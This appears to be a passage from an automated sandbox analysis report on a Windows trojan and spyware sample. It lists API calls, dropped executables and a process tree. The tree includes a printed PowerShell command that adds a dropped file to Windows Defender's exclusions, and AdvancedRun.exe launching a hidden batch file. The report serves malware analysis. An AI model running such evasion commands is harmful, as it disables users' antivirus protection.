                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20DFDF RtlWakeAddressAllNoFence,ZwAlertThreadByThreadId,RtlWakeAddressAllNoFence,30_2_6B20DFDF
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219E20 ZwCancelTimer2,30_2_6B219E20
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A3E22 ZwTraceControl,RtlNtStatusToDosError,RtlAcquireSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlSetLastWin32Error,30_2_6B2A3E22
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219E30 ZwCancelWaitCompletionPacket,30_2_6B219E30
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28FE3F memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B28FE3F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DC600 LdrQueryImageFileKeyOption,RtlInitUnicodeStringEx,ZwQueryValueKey,LdrQueryImageFileKeyOption,RtlFreeHeap,RtlAllocateHeap,ZwQueryValueKey,RtlFreeHeap,RtlUnicodeStringToInteger,memcpy,30_2_6B1DC600
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DB630 ZwWaitForKeyedEvent,30_2_6B1DB630
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219610 ZwEnumerateValueKey,30_2_6B219610
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B262E14 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B262E14
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B212E1C RtlInitializeCriticalSectionEx,ZwDelayExecution,30_2_6B212E1C
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20BE62 ZwProtectVirtualMemory,RtlGetCurrentTransaction,RtlGetCurrentTransaction,30_2_6B20BE62
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AE70 ZwSetInformationWorkerFactory,30_2_6B21AE70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219670 ZwQueryInformationProcess,30_2_6B219670
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21B640 RtlUnhandledExceptionFilter,ZwTerminateProcess,30_2_6B21B640
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21B650 RtlUnhandledExceptionFilter,ZwTerminateProcess,30_2_6B21B650
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219650 ZwQueryValueKey,30_2_6B219650
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B266652 ZwClose,RtlAllocateHeap,memcpy,ZwUnmapViewOfSection,30_2_6B266652
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219EA0 ZwCompareSigningLevels,30_2_6B219EA0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2E9F ZwCreateEvent,ZwClose,30_2_6B1D2E9F
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B262EA3 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B262EA3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A3EBC ZwTraceControl,RtlNtStatusToDosError,RtlSetLastWin32Error,30_2_6B2A3EBC
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3E80 RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,RtlSetThreadSubProcessTag,RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B1D3E80
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FE6B0 RtlSetThreadWorkOnBehalfTicket,memcmp,ZwSetInformationThread,RtlSetThreadWorkOnBehalfTicket,30_2_6B1FE6B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28BE9B RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,30_2_6B28BE9B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20DE9E RtlAcquireSRWLockExclusive,RtlAcquireSRWLockExclusive,RtlGetCurrentServiceSessionId,ZwUnsubscribeWnfStateChange,RtlReleaseSRWLockExclusive,RtlFreeHeap,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockExclusive,RtlFreeHeap,30_2_6B20DE9E
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2196E0 ZwFreeVirtualMemory,30_2_6B2196E0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2ED8 ZwWaitForAlertByThreadId,ZwWaitForAlertByThreadId,30_2_6B1D2ED8
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D66D4 RtlInitUnicodeString,ZwQueryValueKey,30_2_6B1D66D4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B22DEF0 RtlRaiseException,RtlCaptureContext,ZwRaiseException,RtlRaiseStatus,30_2_6B22DEF0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2616FA ZwQueryWnfStateNameInformation,ZwUpdateWnfStateData,EtwEventWriteNoRegistration,30_2_6B2616FA
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1E76FE RtlInitUnicodeString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,RtlAppendUnicodeToString,ZwOpenKey,ZwClose,30_2_6B1E76FE
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2196C0 ZwSetInformationProcess,30_2_6B2196C0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FE6F9 ZwAlpcSetInformation,30_2_6B1FE6F9
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DB6F0 EtwEventWriteNoRegistration,ZwTraceEvent,RtlNtStatusToDosError,30_2_6B1DB6F0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B209ED0 RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,RtlAcquireSRWLockExclusive,RtlAcquireSRWLockShared,RtlReleaseSRWLockExclusive,RtlReleaseSRWLockShared,ZwWaitForAlertByThreadId,30_2_6B209ED0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2196D0 ZwCreateKey,30_2_6B2196D0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8ED6 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8ED6
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B201520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B201520
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219520 ZwWaitForSingleObject,30_2_6B219520
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28FD22 ZwQueryInformationProcess,RtlUniform,30_2_6B28FD22
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B204D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap,30_2_6B204D3B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8D34 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8D34
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261D0B ZwSetInformationProcess,30_2_6B261D0B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21AD10 ZwSetCachedSigningLevel,30_2_6B21AD10
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B296D61 ZwAllocateVirtualMemoryEx,30_2_6B296D61
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261D6A ZwWaitForMultipleObjects,30_2_6B261D6A
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219D70 ZwAlpcQueryInformation,30_2_6B219D70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose,30_2_6B261570
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261D43 ZwQueryInformationThread,30_2_6B261D43
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B200548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory,30_2_6B200548
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A1D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence,30_2_6B2A1D55
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219DA0 ZwAlpcSendWaitReceivePort,30_2_6B219DA0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D3591 ZwSetInformationFile,30_2_6B1D3591
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2195B0 ZwSetInformationThread,30_2_6B2195B0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219DB0 ZwAlpcSetInformation,30_2_6B219DB0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1EDD80 RtlAcquireSRWLockShared,ZwQueryVirtualMemory,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlImageNtHeaderEx,RtlRaiseStatus,RtlAddressInSectionTable,RtlImageDirectoryEntryToData,30_2_6B1EDD80
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B29B581 RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B29B581
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291582 ZwTraceEvent,30_2_6B291582
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D65A0 RtlpGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwQueryLicenseValue,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetDeviceFamilyInfoEnum,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlGetVersion,30_2_6B1D65A0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219DE0 ZwAssociateWaitCompletionPacket,30_2_6B219DE0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D45D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread,30_2_6B1D45D0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2195F0 ZwQueryInformationFile,30_2_6B2195F0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28BDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive,30_2_6B28BDFA
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FEDC4 ZwCancelWaitCompletionPacket,30_2_6B1FEDC4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D4DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation,30_2_6B1D4DC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2195C0 ZwSetEvent,30_2_6B2195C0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D95F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads,30_2_6B1D95F0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2195D0 ZwClose,30_2_6B2195D0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B28FDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B28FDD3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21A420 ZwGetNlsSectionPtr,30_2_6B21A420
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1FFC39 ZwAssociateWaitCompletionPacket,30_2_6B1FFC39
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B210413 ZwUnmapViewOfSection,30_2_6B210413
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B291411 ZwTraceEvent,30_2_6B291411
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DE420 RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,ZwClose,RtlpLoadUserUIByPolicy,ZwClose,30_2_6B1DE420
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8C14 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8C14
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B283C60 RtlFlushSecureMemoryCache,ZwQueryVirtualMemory,30_2_6B283C60
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D5450 RtlClearThreadWorkOnBehalfTicket,memcmp,RtlClearThreadWorkOnBehalfTicket,ZwSetInformationThread,30_2_6B1D5450
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261C76 ZwQueryInformationProcess,30_2_6B261C76
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219C70 ZwAlpcConnectPort,30_2_6B219C70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B215C70 TpSetPoolMaxThreadsSoftLimit,ZwSetInformationWorkerFactory,30_2_6B215C70
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20AC7B ZwFreeVirtualMemory,RtlFillMemoryUlong,RtlFlushSecureMemoryCache,ZwFreeVirtualMemory,RtlGetCurrentServiceSessionId,RtlGetCurrentServiceSessionId,DbgPrint,DbgPrint,DbgPrint,30_2_6B20AC7B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8C75 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8C75
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B219C40 ZwAllocateVirtualMemoryEx,30_2_6B219C40
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261C49 ZwQueryInformationProcess,30_2_6B261C49
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1F746D RtlLeaveCriticalSection,ZwClose,RtlFreeHeap,30_2_6B1F746D
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B210CA1 ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,ZwQuerySecurityAttributesToken,30_2_6B210CA1
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A4CAB ZwTraceControl,30_2_6B2A4CAB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DEC9B RtlInitUnicodeString,ZwOpenKey,RtlpLoadUserUIByPolicy,RtlInitUnicodeString,ZwOpenKey,RtlInitUnicodeString,RtlFreeHeap,ZwClose,ZwClose,RtlInitUnicodeString,ZwOpenKey,RtlAllocateHeap,RtlpLoadMachineUIByPolicy,ZwClose,30_2_6B1DEC9B
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A9CB3 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A9CB3
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B21A480 ZwInitializeNlsFiles,30_2_6B21A480
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B253C93 wcschr,RtlInitUnicodeString,wcstoul,RtlAnsiStringToUnicodeString,RtlCompareUnicodeString,ZwProtectVirtualMemory,DbgPrintEx,RtlFreeUnicodeString,30_2_6B253C93
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B294496 ZwAllocateVirtualMemory,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,DbgPrint,30_2_6B294496
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B261CE4 ZwQueryInformationProcess,30_2_6B261CE4
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1D2CDB RtlFreeHeap,ZwClose,ZwSetEvent,30_2_6B1D2CDB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2914FB memset,RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2914FB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2864FB ZwOpenKey,ZwQueryValueKey,RtlEqualUnicodeString,RtlEqualUnicodeString,RtlEqualUnicodeString,ZwClose,30_2_6B2864FB
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B20CCC0 memcpy,RtlGetNtSystemRoot,RtlInitUnicodeString,memcpy,ZwOpenKey,ZwClose,ZwEnumerateKey,DbgPrintEx,DbgPrintEx,DbgPrintEx,30_2_6B20CCC0
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B2A8CD6 RtlGetCurrentServiceSessionId,ZwTraceEvent,30_2_6B2A8CD6
                      Source: C:\Users\user\AppData\Local\Temp\3C9D.exeCode function: 30_2_6B1DF4E3 RtlEnterCriticalSection,RtlLeaveCriticalSection,ZwSetEvent,30_2_6B1DF4E3
                      Source: 2049.exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: B644.exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 3C9D.exe.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: gjrsehc.7.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: SYzU0M7gx6.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\dtrsehcJump to behavior
                      Source: 1105.tmp.30.drBinary string: \Device\IPT
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@34/27@53/9
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle,32_2_00401306
                      Source: SYzU0M7gx6.exeJoe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource,32_2_0040A33B
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\SYzU0M7gx6.exe 'C:\Users\user\Desktop\SYzU0M7gx6.exe'
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeProcess created: C:\Users\user\Desktop\SYzU0M7gx6.exe 'C:\Users\user\Desktop\SYzU0M7gx6.exe'
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\dtrsehc C:\Users\user\AppData\Roaming\dtrsehc
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9A51.exe C:\Users\user~1\AppData\Local\Temp\9A51.exe
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess created: C:\Users\user\AppData\Local\Temp\9A51.exe C:\Users\user~1\AppData\Local\Temp\9A51.exe
                      Source: C:\Users\user\AppData\Roaming\dtrsehcProcess created: C:\Users\user\AppData\Roaming\dtrsehc C:\Users\user\AppData\Roaming\dtrsehc
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2049.exe C:\Users\user~1\AppData\Local\Temp\2049.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3113.exe C:\Users\user~1\AppData\Local\Temp\3113.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3C9D.exe C:\Users\user~1\AppData\Local\Temp\3C9D.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5508.exe C:\Users\user~1\AppData\Local\Temp\5508.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\6630.exe C:\Users\user~1\AppData\Local\Temp\6630.exe
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /SpecialRun 4101d8 400
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B644.exe C:\Users\user~1\AppData\Local\Temp\B644.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -Force
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeProcess created: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                      Source: C:\Users\user\Desktop\SYzU0M7gx6.exeProcess created: C:\Users\user\Desktop\SYzU0M7gx6.exe 'C:\Users\user\Desktop\SYzU0M7gx6.exe' Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9A51.exe C:\Users\user~1\AppData\Local\Temp\9A51.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -pJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3113.exe C:\Users\user~1\AppData\Local\Temp\3113.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3C9D.exe C:\Users\user~1\AppData\Local\Temp\3C9D.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5508.exe C:\Users\user~1\AppData\Local\Temp\5508.exeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\dtrsehcProcess created: C:\Users\user\AppData\Roaming\dtrsehc C:\Users\user\AppData\Roaming\dtrsehcJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9A51.exeProcess created: C:\Users\user\AppData\Local\Temp\9A51.exe C:\Users\user~1\AppData\Local\Temp\9A51.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess created: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\2049.exe' -ForceJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\2049.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeProcess created: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /RunJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\5508.exeProcess created: unknown unknownJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeProcess created: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exe' /SpecialRun 4101d8 400
                      Source: C:\Users\user\AppData\Local\Temp\e6afa9cb-72f6-46b2-8522-aff4fca0d0ff\AdvancedRun.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 32_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,32_2_00408FC9
                      Source: C:\Users\user\AppData\Local\Temp\6eb3b9b4-c1c9-4717-a52e-6a9cde4138e9\AdvancedRun.exeCode function: 36_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification,36_2_00408FC9
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user~1\AppData\Local\Temp\9A51.tmpJump to behavior
